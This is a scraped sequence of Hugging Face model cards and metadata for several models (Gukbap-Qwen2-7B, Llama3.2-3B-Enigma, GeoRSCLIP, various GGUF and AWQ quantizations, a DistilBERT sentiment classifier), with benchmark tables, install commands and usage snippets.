</details>
### Training Method (SFT)
The following papers contain the foundational methodologies for the dataset and training methods we are using.
- [LIMA](https://arxiv.org/abs/2305.11206).
- [WizardLM](https://arxiv.org/abs/2304.12244).
- [Near Dedup](https://arxiv.org/abs/2304.12244).
### SFT Datasets (Private)
When we made the `Open-Source based dataset`, we used `microsoft/WizardLM-2-8x22B` through [DeepInfra](https://deepinfra.com/).
Our datasets are made with the `Evolving system` proposed by [WizardLM](https://wizardlm.github.io/WizardLM2/).
In training, we used 1,849 training examples and 200 validation examples.
- **Wizard-Korea-Datasets:** [MarkrAI/Markr_WizardLM_train_ver4](https://huggingface.co/datasets/MarkrAI/Markr_WizardLM_train_ver4).
- **Wizard-Korea-Valid:** [WizardLM_Evol_valid](https://huggingface.co/datasets/MarkrAI/WizardLM_Evol_valid).
> Validation loss (epoch 15; Learning rate: 1e-5): 1.0040
### Benchmark Score (Zero-shot)
We internally evaluated [LogicKor](https://github.com/instructkr/LogicKor).
We utilized [**gpt-4-1106-preview**](https://platform.openai.com/docs/models/gpt-4-turbo-and-gpt-4) in internal evaluation.
This is the same manner as the `Logickor-v2 eval model`.
> (GPT-4o occasionally makes errors when grading. For example, it sometimes assigns a score of 0 for English responses to questions that were supposed to be answered in English.)
| Model | Reasoning | Math | Writing | Coding | Understanding | Grammar | **Single-turn** | **Multi-turn** | **Overall** |
|:---------:|:-----:|:------:|:-----:|:-----:|:----:|:-----:|:-----:|:-----:|:----:|
| [OpenAI/gpt-4o-2024-05-13](https://lk.instruct.kr/832k1b3wb3x00e4?file=default_xwfHncVI2v.jsonl) | 9.50 | 8.71 | 9.42 | 9.21 | 9.71 | 9.42 | 9.42 | 9.23 | 9.33 |
| [Anthropic/clauide-3-5-sonnet-20240620](https://lk.instruct.kr/rf8n4j9h6vg1bq7?file=1_shot_R6talIb9Cq.jsonl) | 8.64 | 8.42 | 9.85 | 9.78 | 9.92 | 9.21 | 9.26 | 9.35 | 9.30 |
| [google/gemini-1.5-pro-001](https://lk.instruct.kr/d54q3zaydbamaos?file=default_zE0CfbdTR3.jsonl) | 9.07 | 8.57 | 9.57 | 9.78 | 9.57 | 9.21 | 9.40 | 9.19 | 9.23 |
|----|----|----|----|----|----|----|----|----|----|
| **Gukbap-Qwen2-7B🍚** | 5.71 | **6.43** | **8.07** | **9.14** | 7.29 | 3.57 | **7.02** | **6.38** | **6.70** |
| [mirlab/AkaLlama-llama3-70b-v0.1](https://lk.instruct.kr/p9nzhh5ct0strpo?file=default_1ya4ZKRlUm.jsonl) | 5.14 | 5.35 | 4.14 | 9.00 | 7.85 | **7.50** | 5.97 | 7.02 | 6.50 |
| [Qwen/Qwen2-7B-Instruct](https://lk.instruct.kr/gx4p1k3jojt977d?file=default_guHriJEiaj.jsonl) | **6.07** | 4.71 | 7.21 | 7.00 | 8.00 | 4.85 | 6.61 | 6.00 | 6.30 |
| [yanolja/EEVE-Korean-Instruct-10.8B-v1.0](https://lk.instruct.kr/tnn389my7sa36a7?file=default_bXVomDLocN.jsonl) | 6.00 | 3.64 | 6.64 | 5.64 | **8.42** | 5.85 | 6.61 | 5.45 | 6.01 |
If you want to check the model's output, please see our [⭐answer⭐](https://huggingface.co/HumanF-MarkrAI/Gukbap-Qwen-7B/blob/main/Gukbap-Qwen-7B_0.jsonl) file!
### Benchmark Comparison of 3 Prompt Strategies
| Model (type) | Reasoning | Math | Writing | Coding | Understanding | Grammar | **Single-turn** | **Multi-turn** | **Overall** |
|:---------:|:-----:|:------:|:-----:|:-----:|:----:|:-----:|:-----:|:-----:|:----:|
| **Gukbap-Qwen2-7B🍚 (cot-1-shot)** | 7.07 | 5.71 | **8.86** | 9.00 | **8.07** | **3.86** | **7.79** | 6.40 | **7.10** |
| Gukbap-Qwen2-7B🍚 (1-shot) | **7.50** | 6.00 | 7.86 | 8.71 | 7.21 | 3.57 | 7.10 | **6.52** | 6.81 |
| Gukbap-Qwen2-7B🍚 (0-shot) | 5.71 | **6.43** | 8.07 | **9.14** | 7.29 | 3.57 | 7.02 | 6.38 | 6.70 |
You can find the prompt strategy through logickor [templates](https://github.com/instructkr/LogicKor/blob/main/templates.py#L1).
### Benchmark Code
Our code is based on maywell's [Logickor code](https://github.com/instructkr/LogicKor).
We followed maywell's evaluation method, including the `judge_template`, `prompt`, etc.
### Chat Prompt
```yaml
<|im_start|>user
Hello! My favorite food is Gukbap🍚!<|im_end|>
<|im_start|>assistant
(model answer)
```
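A minimal sketch for building this prompt with the tokenizer's own chat template and generating a reply (the generation settings are illustrative, not the values used for the benchmarks above):

```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "HumanF-MarkrAI/Gukbap-Qwen2-7B"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id, torch_dtype=torch.bfloat16, device_map="auto")

messages = [{"role": "user", "content": "Hello! My favorite food is Gukbap🍚!"}]
prompt = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)

inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
outputs = model.generate(**inputs, max_new_tokens=256)
print(tokenizer.decode(outputs[0][inputs.input_ids.shape[-1]:], skip_special_tokens=True))
```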
### Gukbap-Series models🍚🍚
- [Gukbap-Mistral-7B🍚](https://huggingface.co/HumanF-MarkrAI/Gukbap-Mistral-7B)
- [Gukbap-Gemma-9B🍚](https://huggingface.co/HumanF-MarkrAI/Gukbap-Gemma2-9B)
### BibTeX
```
@article{HumanF-MarkrAI,
title={Gukbap-Qwen2-7B},
author={MarkrAI},
year={2024},
url={https://huggingface.co/HumanF-MarkrAI}
}
```
|
mav23/Llama3.2-3B-Enigma-GGUF | mav23 | 2024-10-10T09:07:24Z | 146 | 1 | null | [
"gguf",
"enigma",
"valiant",
"valiant-labs",
"llama",
"llama-3.2",
"llama-3.2-instruct",
"llama-3.2-instruct-3b",
"llama-3",
"llama-3-instruct",
"llama-3-instruct-3b",
"3b",
"code",
"code-instruct",
"python",
"conversational",
"chat",
"instruct",
"text-generation",
"en",
"dataset:sequelbox/Tachibana",
"dataset:sequelbox/Supernova",
"base_model:meta-llama/Llama-3.2-3B-Instruct",
"base_model:quantized:meta-llama/Llama-3.2-3B-Instruct",
"license:llama3.2",
"model-index",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T08:42:22Z | ---
language:
- en
license: llama3.2
tags:
- enigma
- valiant
- valiant-labs
- llama
- llama-3.2
- llama-3.2-instruct
- llama-3.2-instruct-3b
- llama-3
- llama-3-instruct
- llama-3-instruct-3b
- 3b
- code
- code-instruct
- python
- conversational
- chat
- instruct
base_model: meta-llama/Llama-3.2-3B-Instruct
datasets:
- sequelbox/Tachibana
- sequelbox/Supernova
pipeline_tag: text-generation
model_type: llama
model-index:
- name: Llama3.2-3B-Enigma
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: Winogrande (5-Shot)
type: winogrande
args:
num_few_shot: 5
metrics:
- type: acc
value: 67.96
name: acc
- task:
type: text-generation
name: Text Generation
dataset:
name: ARC Challenge (25-Shot)
type: arc-challenge
args:
num_few_shot: 25
metrics:
- type: acc_norm
value: 47.18
name: normalized accuracy
- task:
type: text-generation
name: Text Generation
dataset:
name: IFEval (0-Shot)
type: HuggingFaceH4/ifeval
args:
num_few_shot: 0
metrics:
- type: inst_level_strict_acc and prompt_level_strict_acc
value: 47.75
name: strict accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=ValiantLabs/Llama3.2-3B-Enigma
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: BBH (3-Shot)
type: BBH
args:
num_few_shot: 3
metrics:
- type: acc_norm
value: 18.81
name: normalized accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=ValiantLabs/Llama3.2-3B-Enigma
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MATH Lvl 5 (4-Shot)
type: hendrycks/competition_math
args:
num_few_shot: 4
metrics:
- type: exact_match
value: 6.65
name: exact match
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=ValiantLabs/Llama3.2-3B-Enigma
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GPQA (0-shot)
type: Idavidrein/gpqa
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 1.45
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=ValiantLabs/Llama3.2-3B-Enigma
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MuSR (0-shot)
type: TAUR-Lab/MuSR
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 4.54
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=ValiantLabs/Llama3.2-3B-Enigma
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU-PRO (5-shot)
type: TIGER-Lab/MMLU-Pro
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 15.41
name: accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=ValiantLabs/Llama3.2-3B-Enigma
name: Open LLM Leaderboard
---

Enigma is a code-instruct model built on Llama 3.2 3b.
- High quality code instruct performance with the Llama 3.2 Instruct chat format
- Finetuned on synthetic code-instruct data generated with Llama 3.1 405b. [Find the current version of the dataset here!](https://huggingface.co/datasets/sequelbox/Tachibana)
- Overall chat performance supplemented with [generalist synthetic data.](https://huggingface.co/datasets/sequelbox/Supernova)
## Version
This is the **2024-09-30** release of Enigma for Llama 3.2 3b, enhancing code-instruct and general chat capabilities.
Enigma is also available for [Llama 3.1 8b!](https://huggingface.co/ValiantLabs/Llama3.1-8B-Enigma)
Help us and recommend Enigma to your friends! We're excited for more Enigma releases in the future.
## Prompting Guide
Enigma uses the [Llama 3.2 Instruct](https://huggingface.co/meta-llama/Llama-3.2-3B-Instruct) prompt format. The example script below can be used as a starting point for general chat:
```python
import transformers
import torch
model_id = "ValiantLabs/Llama3.2-3B-Enigma"
pipeline = transformers.pipeline(
"text-generation",
model=model_id,
model_kwargs={"torch_dtype": torch.bfloat16},
device_map="auto",
)
messages = [
{"role": "system", "content": "You are Enigma, a highly capable code assistant."},
{"role": "user", "content": "Can you explain virtualization to me?"}
]
outputs = pipeline(
messages,
max_new_tokens=1024,
)
print(outputs[0]["generated_text"][-1])
```
## The Model
Enigma is built on top of Llama 3.2 3b Instruct, using high quality code-instruct data and general chat data in Llama 3.2 Instruct prompt style to supplement overall performance.
Our current version of Enigma is trained on code-instruct data from [sequelbox/Tachibana](https://huggingface.co/datasets/sequelbox/Tachibana) and general chat data from [sequelbox/Supernova.](https://huggingface.co/datasets/sequelbox/Supernova)

Enigma is created by [Valiant Labs.](http://valiantlabs.ca/)
[Check out our HuggingFace page for Shining Valiant 2 and our other Build Tools models for creators!](https://huggingface.co/ValiantLabs)
[Follow us on X for updates on our models!](https://twitter.com/valiant_labs)
We care about open source.
For everyone to use.
We encourage others to finetune further from our models.
|
Zilun/GeoRSCLIP | Zilun | 2024-10-10T09:06:08Z | 0 | 10 | null | [
"en",
"dataset:Zilun/RS5M",
"license:cc",
"region:us"
] | null | 2023-11-23T20:14:34Z | ---
license: cc
datasets:
- Zilun/RS5M
language:
- en
metrics:
- accuracy
- recall
---
## GeoRSCLIP Model
* **GeoRSCLIP with ViT-B-32 and ViT-H-14 backbone**
* **GeoRSCLIP-FT for retrieval**
### Installation
* Install PyTorch following the instructions from the official website (we tested with torch 2.0.1 + CUDA 11.8 and torch 2.1.0 + CUDA 12.1)
```bash
pip install torch==2.0.1 torchvision==0.15.2 torchaudio==2.0.2 --index-url https://download.pytorch.org/whl/cu118
```
* Install other dependencies
```bash
pip install pillow pandas scikit-learn ftfy tqdm matplotlib transformers adapter-transformers open_clip_torch pycocotools timm clip-benchmark torch-rs
```
### Usage
* Clone the repo from: https://huggingface.co/Zilun/GeoRSCLIP
```bash
git clone https://huggingface.co/Zilun/GeoRSCLIP
cd GeoRSCLIP
```
* Unzip the test data
```bash
unzip data/rs5m_test_data.zip
```
* Run the inference script:
```bash
python codebase/inference.py --ckpt-path /your/local/path/to/RS5M_ViT-B-32.pt --test-dataset-dir /your/local/path/to/rs5m_test_data
```
* (Optional) If you just want to load the GeoRSCLIP model:
```python
import open_clip
import torch
from inference_tool import get_preprocess
ckpt_path = "/your/local/path/to/RS5M_ViT-B-32.pt"
model, _, _ = open_clip.create_model_and_transforms("ViT-B/32", pretrained="openai")
checkpoint = torch.load(ckpt_path, map_location="cpu")
msg = model.load_state_dict(checkpoint, strict=False)
model = model.to("cuda")
img_preprocess = get_preprocess(
image_resolution=224,
)
```
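With the checkpoint loaded, image-text similarity can be computed as for any CLIP-style model. A minimal sketch (the image path and the candidate captions below are placeholders, not part of the original repo):
```python
from PIL import Image
import torch

tokenizer = open_clip.get_tokenizer("ViT-B-32")
image = img_preprocess(Image.open("example_rs_image.jpg")).unsqueeze(0).to("cuda")
texts = tokenizer(["an aerial image of an airport", "an aerial image of a forest"]).to("cuda")

with torch.no_grad():
    image_features = model.encode_image(image)
    text_features = model.encode_text(texts)
    # normalize and score the candidate captions against the image
    image_features = image_features / image_features.norm(dim=-1, keepdim=True)
    text_features = text_features / text_features.norm(dim=-1, keepdim=True)
    probs = (100.0 * image_features @ text_features.T).softmax(dim=-1)

print(probs)
```
The ViT-H-14 variant is loaded the same way: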
```python
import open_clip
import torch
from inference_tool import get_preprocess
ckpt_path = "/your/local/path/to/RS5M_ViT-H-14.pt"
model, _, _ = open_clip.create_model_and_transforms("ViT-H/14", pretrained="laion2b_s32b_b79k")
checkpoint = torch.load(ckpt_path, map_location="cpu")
msg = model.load_state_dict(checkpoint, strict=False)
model = model.to("cuda")
img_preprocess = get_preprocess(
image_resolution=224,
)
``` |
aimlresearch2023/llama-3.3-1b-it-merged-Q6_K-GGUF | aimlresearch2023 | 2024-10-10T08:54:36Z | 458 | 1 | transformers | [
"transformers",
"gguf",
"text-generation-inference",
"unsloth",
"llama",
"trl",
"llama-cpp",
"gguf-my-repo",
"en",
"base_model:AI-ML-Research/llama-3.2-1b-it-merged",
"base_model:quantized:AI-ML-Research/llama-3.2-1b-it-merged",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T08:54:30Z | ---
base_model: AiisNothing/llama-3.3-1b-it-merged
language:
- en
license: apache-2.0
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
- llama-cpp
- gguf-my-repo
---
# aimlresearch2023/llama-3.3-1b-it-merged-Q6_K-GGUF
This model was converted to GGUF format from [`AiisNothing/llama-3.3-1b-it-merged`](https://huggingface.co/AiisNothing/llama-3.3-1b-it-merged) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/AiisNothing/llama-3.3-1b-it-merged) for more details on the model.
## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux)
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo aimlresearch2023/llama-3.3-1b-it-merged-Q6_K-GGUF --hf-file llama-3.3-1b-it-merged-q6_k.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo aimlresearch2023/llama-3.3-1b-it-merged-Q6_K-GGUF --hf-file llama-3.3-1b-it-merged-q6_k.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well.
Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo aimlresearch2023/llama-3.3-1b-it-merged-Q6_K-GGUF --hf-file llama-3.3-1b-it-merged-q6_k.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo aimlresearch2023/llama-3.3-1b-it-merged-Q6_K-GGUF --hf-file llama-3.3-1b-it-merged-q6_k.gguf -c 2048
```
|
abhinav-2k23/Llama-3-8B-AWQ-4bit_v4 | abhinav-2k23 | 2024-10-10T08:49:51Z | 76 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"conversational",
"en",
"base_model:meta-llama/Meta-Llama-3-8B-Instruct",
"base_model:quantized:meta-llama/Meta-Llama-3-8B-Instruct",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"awq",
"region:us"
] | text-generation | 2024-07-24T16:11:27Z | ---
language:
- en
base_model:
- meta-llama/Meta-Llama-3-8B-Instruct
--- |
ashtaaav/movie-review-sentiment | ashtaaav | 2024-10-10T08:37:38Z | 105 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"distilbert",
"text-classification",
"generated_from_trainer",
"base_model:distilbert/distilbert-base-uncased",
"base_model:finetune:distilbert/distilbert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-10-10T08:17:01Z | ---
base_model: distilbert-base-uncased
library_name: transformers
license: apache-2.0
metrics:
- accuracy
tags:
- generated_from_trainer
model-index:
- name: movie-review-sentiment
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# movie-review-sentiment
This model is a fine-tuned version of [distilbert-base-uncased](https://huggingface.co/distilbert-base-uncased) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.7205
- Accuracy: 0.9036
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 5
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy |
|:-------------:|:-----:|:----:|:---------------:|:--------:|
| 0.1879 | 1.0 | 500 | 0.5573 | 0.8916 |
| 0.1079 | 2.0 | 1000 | 0.5758 | 0.8964 |
| 0.0351 | 3.0 | 1500 | 0.6399 | 0.8948 |
| 0.0133 | 4.0 | 2000 | 0.6725 | 0.9084 |
| 0.0024 | 5.0 | 2500 | 0.7205 | 0.9036 |
### Framework versions
- Transformers 4.44.2
- Pytorch 2.4.1+cu121
- Datasets 3.0.1
- Tokenizers 0.19.1
|
old6ix/good-start | old6ix | 2024-10-10T08:32:31Z | 162 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-09T03:14:46Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf | RichardErkhov | 2024-10-10T08:24:19Z | 9 | 0 | null | [
"gguf",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T04:57:09Z | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
Seagull-llama-3-8B-orpo-v0.4 - GGUF
- Model creator: https://huggingface.co/jsk0214/
- Original model: https://huggingface.co/jsk0214/Seagull-llama-3-8B-orpo-v0.4/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [Seagull-llama-3-8B-orpo-v0.4.Q2_K.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q2_K.gguf) | Q2_K | 2.96GB |
| [Seagull-llama-3-8B-orpo-v0.4.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.IQ3_XS.gguf) | IQ3_XS | 3.28GB |
| [Seagull-llama-3-8B-orpo-v0.4.IQ3_S.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.IQ3_S.gguf) | IQ3_S | 3.43GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q3_K_S.gguf) | Q3_K_S | 3.41GB |
| [Seagull-llama-3-8B-orpo-v0.4.IQ3_M.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.IQ3_M.gguf) | IQ3_M | 3.52GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q3_K.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q3_K.gguf) | Q3_K | 3.74GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q3_K_M.gguf) | Q3_K_M | 3.74GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q3_K_L.gguf) | Q3_K_L | 4.03GB |
| [Seagull-llama-3-8B-orpo-v0.4.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.IQ4_XS.gguf) | IQ4_XS | 4.18GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q4_0.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q4_0.gguf) | Q4_0 | 4.34GB |
| [Seagull-llama-3-8B-orpo-v0.4.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.IQ4_NL.gguf) | IQ4_NL | 4.38GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q4_K_S.gguf) | Q4_K_S | 4.37GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q4_K.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q4_K.gguf) | Q4_K | 4.58GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q4_K_M.gguf) | Q4_K_M | 4.58GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q4_1.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q4_1.gguf) | Q4_1 | 4.78GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q5_0.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q5_0.gguf) | Q5_0 | 5.21GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q5_K_S.gguf) | Q5_K_S | 5.21GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q5_K.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q5_K.gguf) | Q5_K | 5.34GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q5_K_M.gguf) | Q5_K_M | 5.34GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q5_1.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q5_1.gguf) | Q5_1 | 5.65GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q6_K.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q6_K.gguf) | Q6_K | 6.14GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q8_0.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q8_0.gguf) | Q8_0 | 7.95GB |
Original model description:
---
language:
- en
license: other
license_name: llama3
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
- orpo
base_model: kuotient/Meta-Llama-3-8B
---
# Uploaded model
- **Developed by:** kuotient
- **License:** apache-2.0
- **Finetuned from model :** kuotient/Meta-Llama-3-8B
